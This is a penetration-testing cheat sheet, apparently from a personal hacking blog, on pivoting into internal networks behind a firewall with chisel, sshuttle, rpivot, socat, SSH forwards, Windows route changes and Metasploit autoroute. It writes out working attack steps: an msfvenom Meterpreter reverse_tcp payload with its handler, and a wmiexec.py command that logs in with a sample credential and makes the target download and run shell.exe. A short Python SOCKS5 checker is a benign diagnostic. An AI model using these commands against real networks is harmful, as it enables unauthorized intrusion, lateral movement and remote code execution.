
Pivoting into an internal network behind firewall
Accessing a victim network from a Windows box that is routed through Kali 

#On Kali - first bring the victim network onto Kali, with either sshuttle or a chisel reverse SOCKS proxy
sshuttle --listen 0.0.0.0 -r user@10.10.10.10 192.168.1.0/24
# or
./chisel server --port 9001 -reverse
#On Victim - reverse SOCKS proxy, listening on all of Kali's interfaces (not only loopback)
./chisel.exe client 10.10.10.1:9001 R:0.0.0.0:1080:socks
#or forward individual ports instead of a SOCKS proxy
.\chisel.exe client 10.10.10.1:9001 R:8080:127.0.0.1:8080 R:8888:127.0.0.1:8888 R:9090:127.0.0.1:9090

#On Windows (elevated prompt) - note the current default gateway so you can restore it later
route print
#delete the default route
route delete 0.0.0.0

#add a new default route via Kali; KALI_IP must be on the same subnet as the Windows box
route add 0.0.0.0 mask 0.0.0.0 KALI_IP

#Now everything reachable from Kali should be reachable from the Windows box.

#If the above does not work (assuming Kali and Windows are both on eth0):
#add a Windows firewall rule that allows traffic from Kali
netsh advfirewall firewall add rule name="Allow VPN Traffic" dir=in action=allow protocol=any remoteip=KALI_ETH0_IP
#on Kali - forward and NAT the traffic out of tun0 (Kali must also have IPv4 forwarding enabled; it is off by default)
sudo iptables -P FORWARD ACCEPT
sudo iptables -t nat -A POSTROUTING -o tun0 -j MASQUERADE
#add the two rules below if the issue persists
sudo iptables -A FORWARD -i tun0 -o eth0 -j ACCEPT
sudo iptables -A FORWARD -i eth0 -o tun0 -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT

Note: say you tunnelled a victim service to Kali and it is reachable on Kali as 127.0.0.1. From Windows you access it via Kali's eth0 IP address instead (e.g. http://192.168.10.10), which only works if the forward listens on all interfaces (R:0.0.0.0:... as above) rather than on loopback alone.
#In case of any issues, try routing the loopback range to Kali from Windows. Caveat: Windows handles 127.0.0.0/8 inside its own stack, so this generally does not send anything on the wire; prefer the eth0 method above.
route delete 127.0.0.1
route delete 127.0.0.0
route add 127.0.0.0 mask 255.0.0.0 KALI_IP
route add 127.0.0.1 mask 255.255.255.255 KALI_IP

#to revert the changes (VMWare_Gateway is the original default gateway noted from route print, e.g. 192.168.206.2)
route delete 0.0.0.0
route add 0.0.0.0 mask 0.0.0.0 VMWare_Gateway


Get a Meterpreter session on the target and route the internal network through it 

#generate the payload (Linux target here; LHOST/LPORT are the attacker's)
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.14.14.3 LPORT=4444 -f elf -o rev

msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 10.14.14.3
set LPORT 4444
run
#once the session opens, send it to the background and note its id
background
sessions -l
#route the internal subnet through that session (SESSION is the id shown by sessions -l)
use post/multi/manage/autoroute
set SUBNET 192.168.125.0
set SESSION 4
run
#expose the routed network as a SOCKS proxy, then point proxychains at 127.0.0.1:1060
use auxiliary/server/socks_proxy
set SRVPORT 1060
run
Getting a Meterpreter session from an internal host you cannot reach directly, but on which RCE is possible

┌──(Bhanu㉿HackingDream)-[~]
└─$ ./chisel server --port 9002 -reverse


#the victim listens on 6666 and forwards every connection to 127.0.0.1:6666 on Kali (a local forward, no R:)
user@victim:/tmp$ ./chisel client KALI_IP:9002 6666:127.0.0.1:6666

Create a payload with HackTheWorld or msfvenom whose LHOST is the victim's internal IP and whose LPORT is 6666, so the internal target connects back to the victim and chisel carries it to Kali. The handler's payload must match what you generated: the handler below is stageless (windows/meterpreter_reverse_tcp); for a staged payload set both sides to windows/meterpreter/reverse_tcp.
Go to the Meterpreter session

background
use exploit/multi/handler
set payload windows/meterpreter_reverse_tcp
set LHOST 0.0.0.0
set LPORT 6666
run

Upload the reverse shell somewhere in the internal network and run it on the target machine using some other means.
Example (wmiexec.py through proxychains; INTERNAL_HOST_IP is the internal box serving shell.exe on port 8000):
proxychains wmiexec.py -debug -nooutput domain/username:'P@$$W0rd1'@192.168.111.111 "powershell.exe Invoke-WebRequest -Uri 'http://INTERNAL_HOST_IP:8000/shell.exe' -OutFile 'C:\Windows\System32\spool\drivers\color\shell.exe'; cmd.exe /c C:\Windows\System32\spool\drivers\color\shell.exe"
Starting a Reverse Tunnel using Chisel 

┌──(Bhanu㉿HackingDream)-[~/
└─$ ./chisel server --reverse   #listens on the default port 8080

on Victim:
chisel.exe client http://10.14.14.14:8080 R:0.0.0.0:1080:socks

#when the client connects you should see the line below on your Kali machine
server: session#1: tun: proxy#R:1080=>socks: Listening


Chisel's proxy speaks SOCKS5, so add "socks5 127.0.0.1 1080" to /etc/proxychains.conf and use proxychains to connect from your Kali box to any IP/port the target machine can reach. 
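proxychains gives little feedback when the SOCKS CONNECT fails on the far side of the pivot, so it is worth checking the proxy directly before tunnelling tools through it. The following script is an added example (not part of the original post, not chisel or Metasploit code): it performs the SOCKS5 handshake against a chisel reverse SOCKS proxy or Metasploit's auxiliary/server/socks_proxy, asks the proxy to CONNECT to an internal host, and reports the reply code, which tells you whether the pivot can actually reach that host. The proxy and target addresses on the command line are assumptions; rpivot serves SOCKS4 and is not covered by this check.

```python
"""
SOCKS5 reachability check for a pivot proxy (added example, not from the original page).
Speaks RFC 1928 directly: greeting -> method select -> CONNECT -> reply.
usage: socks_check.py PROXY_HOST PROXY_PORT TARGET_HOST TARGET_PORT
   e.g. socks_check.py 127.0.0.1 1080 192.168.1.5 445      (addresses are assumptions)
"""
from __future__ import annotations
import socket
import struct

SOCKS_VERSION = 5
NO_AUTH = 0x00
CMD_CONNECT = 0x01
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 0x01, 0x03, 0x04

# Reply codes from RFC 1928 section 6; anything but 0 means the pivot could not connect.
REPLY_TEXT = {
    0x00: "succeeded",
    0x01: "general SOCKS server failure",
    0x02: "connection not allowed by ruleset",
    0x03: "network unreachable",
    0x04: "host unreachable",
    0x05: "connection refused",
    0x06: "TTL expired",
    0x07: "command not supported",
    0x08: "address type not supported",
}


def build_greeting() -> bytes:
    # VER, NMETHODS, METHODS: offer only "no authentication", which chisel and msf accept by default
    return bytes([SOCKS_VERSION, 1, NO_AUTH])


def build_connect_request(host: str, port: int) -> bytes:
    """VER CMD RSV ATYP DST.ADDR DST.PORT. A dotted quad is sent as ATYP 1; anything else
    is sent as a domain name (ATYP 3) so the *proxy* resolves it inside the pivoted
    network, which is what proxychains' proxy_dns option does for you."""
    try:
        addr = bytes([ATYP_IPV4]) + socket.inet_aton(host)
    except OSError:
        name = host.encode("idna")
        if len(name) > 255:
            raise ValueError("hostname too long for SOCKS5")
        addr = bytes([ATYP_DOMAIN, len(name)]) + name
    return bytes([SOCKS_VERSION, CMD_CONNECT, 0x00]) + addr + struct.pack("!H", port)


def parse_reply(data: bytes) -> tuple[int, str, str, int]:
    """Parse the server reply; returns (code, text, bound_addr, bound_port)."""
    if len(data) < 4 or data[0] != SOCKS_VERSION:
        raise ValueError("not a SOCKS5 reply: %r" % data[:4])
    code, atyp = data[1], data[3]
    if atyp == ATYP_IPV4:
        addr, rest = socket.inet_ntoa(data[4:8]), data[8:]
    elif atyp == ATYP_DOMAIN:
        n = data[4]
        addr, rest = data[5:5 + n].decode(), data[5 + n:]
    elif atyp == ATYP_IPV6:
        addr, rest = socket.inet_ntop(socket.AF_INET6, data[4:20]), data[20:]
    else:
        raise ValueError("unknown ATYP %d" % atyp)
    if len(rest) < 2:
        raise ValueError("truncated reply")
    return code, REPLY_TEXT.get(code, "unknown"), addr, struct.unpack("!H", rest[:2])[0]


def check_socks_proxy(proxy: tuple[str, int], target: tuple[str, int], timeout: float = 5.0) -> tuple[int, str]:
    """Run the full exchange against a live proxy and return (reply code, text)."""
    with socket.create_connection(proxy, timeout=timeout) as s:
        s.sendall(build_greeting())
        ver, method = s.recv(2)
        if ver != SOCKS_VERSION or method != NO_AUTH:
            raise RuntimeError(f"proxy rejected no-auth (ver={ver}, method={method:#x})")
        s.sendall(build_connect_request(*target))
        code, text, _, _ = parse_reply(s.recv(262))  # 262 = longest possible SOCKS5 reply
        return code, text


if __name__ == "__main__":
    import sys
    proxy = (sys.argv[1], int(sys.argv[2]))
    target = (sys.argv[3], int(sys.argv[4]))
    code, text = check_socks_proxy(proxy, target)
    print(f"CONNECT {target[0]}:{target[1]} via {proxy[0]}:{proxy[1]} -> {code} {text}")
    sys.exit(0 if code == 0 else 1)
```

A non-zero reply with text "host unreachable" or "connection refused" comes from the proxy end on the pivot host, which is the quickest way to tell a dead internal target apart from a broken tunnel (the latter shows up as a failed TCP connect to the proxy or a bad greeting reply).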
Using RPivot to connect to Internal network 

┌──(bhanu㉿kali)-[~/Downloads/Tools/Pivot /rpivot]
└─$ python2.7 server.py --server-port 9999 --server-ip 0.0.0.0 --proxy-ip 127.0.0.1 --proxy-port 1080
#printed by server.py once the client below connects
New connection from host 10.10.10.12, source port 4329


on Victim/Target:
python client.py --server-ip 10.10.10.10 --server-port 9999

#sudo nano /etc/proxychains.conf - rpivot exposes a SOCKS4 proxy
socks4 127.0.0.1 1080

Access the victim network with: proxychains tool_name
Pivoting using sshuttle

#routes 192.168.2.0/24 through the SSH host; --listen 0.0.0.0 lets other hosts use Kali as their gateway too
sshuttle --listen 0.0.0.0 -r username@10.10.10.10 192.168.2.0/24
Using socat to set up a relay to the target server 


#on the jumpbox from where the target server is accessible: listen on 1433 and hand each connection to the target
#(the listen and connect addresses are separate arguments; fork serves more than one client)
.\socat.exe tcp-listen:1433,fork,reuseaddr tcp-connect:TARGET_SERVER_IP:1433

#on Kali: set up a relay from the jumpbox to Kali, so that we can access the target from the attacker machine
#Local SQL Client → Kali → Socat → Jumpbox → Socat → TARGET_SERVER

socat tcp-l:1433,fork,reuseaddr tcp:JUMP_BOX:1433
Adding a route to a different network that is reachable through an existing interface

#sudo ip route add CIDR dev Interface
sudo ip route add 10.10.0.0/24 dev tun2
Port forwarding into an internal network over SSH

#plain login to the jump host
ssh -i id_rsa bhanu@10.10.10.10
#local forward: 127.0.0.1:80 on Kali reaches 192.168.1.5:80 via the jump host (local ports below 1024 need root; use e.g. 8080:192.168.1.5:80 otherwise)
ssh -L 80:192.168.1.5:80 -i id_rsa bhanu@10.10.10.10
